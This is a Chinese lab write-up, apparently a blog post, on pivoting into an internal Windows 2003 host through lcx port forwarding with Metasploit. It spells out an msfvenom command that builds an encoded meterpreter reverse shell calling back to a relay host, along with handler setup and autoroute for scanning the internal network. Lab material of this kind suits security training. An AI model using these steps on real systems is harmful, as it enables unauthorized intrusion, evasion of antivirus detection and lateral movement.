首页 > 编程语言 >Metasploit攻击Win2003实例

Metasploit攻击Win2003实例

时间:2023-10-26 15:12:46浏览次数:32  
标签:Metasploit 主机 tran 端口 目标 Win2003 实例 攻击者 port

一、实验目的

在学习并掌握metasploit工具的端口转发进行内网渗透,使用shell编码绕过检测以及了解端口转发原理和使用端口转发常用工具

 

 

二、实验内容

 

在实验模拟环境下对内网中的主机通过端口转发进行渗透,取得主机的shell。

 

三、实验步骤

 

  1. 查看目标机,攻击机,公网机器的ip地址以及账户

 

 

 

2.为了演示内网渗透需要使目标主机与攻击主机不能互相连接,在攻击主机执行下面的iptable配置命令使得目标主机与攻击主机不能相互连接。参数-I是表示Insert(添加),-D表示Delete(删除)。后面跟的是规则,INPUT表示入站,10.1.1.134是攻击主机的IP,DROP表示放弃连接。

iptables -I INPUT -s 10.1.1.134 -j DROP 屏蔽10.1.1.134主机

iptables –L 列出iptables的所有规则

 

 

 3.攻击机与靶机之间不能够互相通信

 

 

4.靶机开启远程桌面

 

 5.监听3300端口

在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。

 

 

6.在靶机上执行

“lcx –slave attack_ip tran_port localhost_ip 3389”,attack_ip是攻击主机ip,tran_port是攻击主机监听的端口,localhost_ip是目标主机内网ip,3389是目标主机远程桌面使用的端口

 

 

7.在公网主机执行“lcx –listen tran_port copy_port”端口转发,tran_port为转发端口,copy_port为tran_port的映射端口。将lcx拷贝到桌面,cmd进入桌面,执行下列命令。

      lcx -listen 1122 3300

 

 

 

8.打开远程桌面连接,输入本地回环地址和指定的端口号进行远程桌面连接操作

 

 

9.msf进行内网渗透,打开msf

 

 10.使用exploit/multi/handler模块,设置攻击载荷和本地主机流量通过的端口号以及公网主机的ip地址作为RHOST

 

 11.命令行中执行msfvenom命令制作一个能连接公网主机4000端口的反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.143 LPORT=4000 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe -o /root/payload.exe

 

 

 12.攻击主机执行exploit命令后,将payload.exe拷贝到win2003主机并点击运行, 公网主机运行的lcx程序状态如下

 

 

13.攻击成功后显示:

 

 14.获取uid

 

 15.还可以为metasploit添加到内网的路由,然后进行内网扫描。添加到内网的路由后,metasploit可以访问目标主机内网中的任意一台主机。

 run autoroute -s 10.1.1.134

 

 

 

 

四、实验小结

绑定shell与反弹shell的区别是什么?各自适合于怎样的应用场景?

绑定 Shell:

定义: 绑定 shell 是在目标系统上启动一个网络服务,并等待攻击者连接。一旦连接建立,攻击者就能够与目标系统进行交互。

应用场景: 适用于目标系统能够主动启动网络服务的情况,例如通过运行恶意程序或利用漏洞后,攻击者在目标系统上启动服务等待连接。

反弹 Shell:

定义: 反弹 shell 是攻击者在目标系统上执行恶意代码,使其成为一个网络服务,然后攻击者从远程位置连接到该服务,实现对目标系统的控制。

应用场景: 适用于目标系统能够执行外部命令的情况,例如攻击者成功注入代码或利用漏洞后,目标系统能够与攻击者的服务器建立连接。

选择使用场景:

绑定 Shell: 适用于目标系统能够主动启动网络服务,而攻击者需要等待连接的情况,比如目标系统中运行了一个可利用的漏洞。

反弹 Shell: 适用于攻击者能够在目标系统上执行代码,建立一个与攻击者控制服务器的连接,使得攻击者可以主动控制目标系统。

 

使用php语言编写一个端口转发的程序:

 

本地服务器: 运行这个 PHP 脚本的服务器(本地监听地址为 127.0.0.1,端口为 8888)。

目标服务器: 一个你想与之通信的目标服务器(目标地址为 目标IP,端口为 8080)。

运行此php脚本后,简单的场景模型如下:

客户端 <-> 本地服务器 <-> 目标服务器

标签:Metasploit,主机,tran,端口,目标,Win2003,实例,攻击者,port
From: https://www.cnblogs.com/C418-minecraft/p/17789447.html

相关文章

  • PHP RSA加密解密实例
    <?phpheader('Content-Type:text/html;charset=utf-8');//RSA加密解密实例$private_key=<<<EOF-----BEGINRSAPRIVATEKEY-----MIICXQIBAAKBgQC3//sR2tXw0wrC2DySx8vNGlqt3Y7ldU9+LBLI6e1KS5lfc5jlTGF7KBTSkCHBM3ouEHWqp1Z......
  • 企业网核心交换机VSS配置实例
    以下配置为公司网络中核心交换机之间配置VSS的实例,其中交换机名字的命名规则为:楼层-角色-名字。配置核心交换机SW016F-CORE-SW01(config)#interface range tenGigabitEthernet 5/4 – 56F-CORE-SW01(config-if-range)#channel-group 1 mode on 6F-CORE-SW01(config-if-ran......
  • 开发实例:后端Java和前端vue实现文件上传和下载功能
    首先,在Java的后端代码中,我们可以使用Spring框架来实现文件上传和下载功能。以下是一个简单的示例:文件上传首先,我们需要在html页面上创建一个表单,其中包含一个file类型的输入字段:<formaction="/upload"method="POST"enctype="multipart/form-data"><inputtype=......
  • FILTER-POLICY的应用实例
    具体需求1)技术部不能访问任何部门,任何部门不能访问技术部2)销售部不能访问财务部3)销售部能访问总部4)财务部能访问总部5)总部能够访问财务部和销售部配置内容R1:<r1>displaycurrent-configuration [V200R003C00]#sysnamer1#snmp-agentlocal-engineid800007DB0300000000000......
  • 前端面试题:原型 / 构造函数 / 实例
    1、原型/构造函数/实例原型(prototype): 一个简单的对象,用于实现对象的继承构造函数:可通过new来新建一个对象的函数实例:通过构造函数和new创建出的对象实例通过__proto__指向原型通过constructor指向构造函数缺个图?实例上......
  • Metasploit Linux Reverse_Tcp Shellcode 源码分析
    分析Metasploitlinux/x64/shell/reverse_tcpshellcodeShellcode生成使用msfvenom生成c格式的stagedshellcode$msfvenom-plinux/x64/shell/reverse_tcp-fc-ax64--platformlinuxLHOST=192.168.48.233LPORT=4444Payloadsize:130bytesFinalsizeofcf......
  • 华为云耀云服务器L实例:初级篇-conda与python环境配置
     华为云耀云服务器L实例是一款可快速部署且易于运维的轻量级云服务器,专为中小企业和入门级开发者打造。它不仅拥有华为云擎天架构的强大性能,还具有多项用户体验优化方案,让用户轻松上手,享受简单上云的乐趣。本产品网址为:https://www.huaweicloud.com/product/hecs-light.html......
  • 【记录10】华为云耀云服务器L实例-使用Docker拉取nginx镜像的部署示例
     Docker 是一个开源平台,用于开发、运输和运行应用程序。它使用容器化技术来包装应用程序及其依赖项,以便在任何环境中都能一致地运行。简单来说,Docker 可以将应用程序及其所有依赖项打包成一个容器,这样就可以确保它无论在哪里运行都表现一致。 ### Docker 的主要组件:1.......
  • 华为云耀云服务器L实例:初级篇-mysql安装与配置
     华为云耀云服务器L实例是一款可快速部署且易于运维的轻量级云服务器,专为中小企业和入门级开发者打造。它不仅拥有华为云擎天架构的强大性能,还具有多项用户体验优化方案,让用户轻松上手,享受简单上云的乐趣。本产品网址为:https://www.huaweicloud.com/product/hecs-light.html......
  • 华为云耀云服务器L实例:初级篇-tomcat配置部署
     华为云耀云服务器L实例是一款可快速部署且易于运维的轻量级云服务器,专为中小企业和入门级开发者打造。它不仅拥有华为云擎天架构的强大性能,还具有多项用户体验优化方案,让用户轻松上手,享受简单上云的乐趣。本产品网址为:https://www.huaweicloud.com/product/hecs-light.html......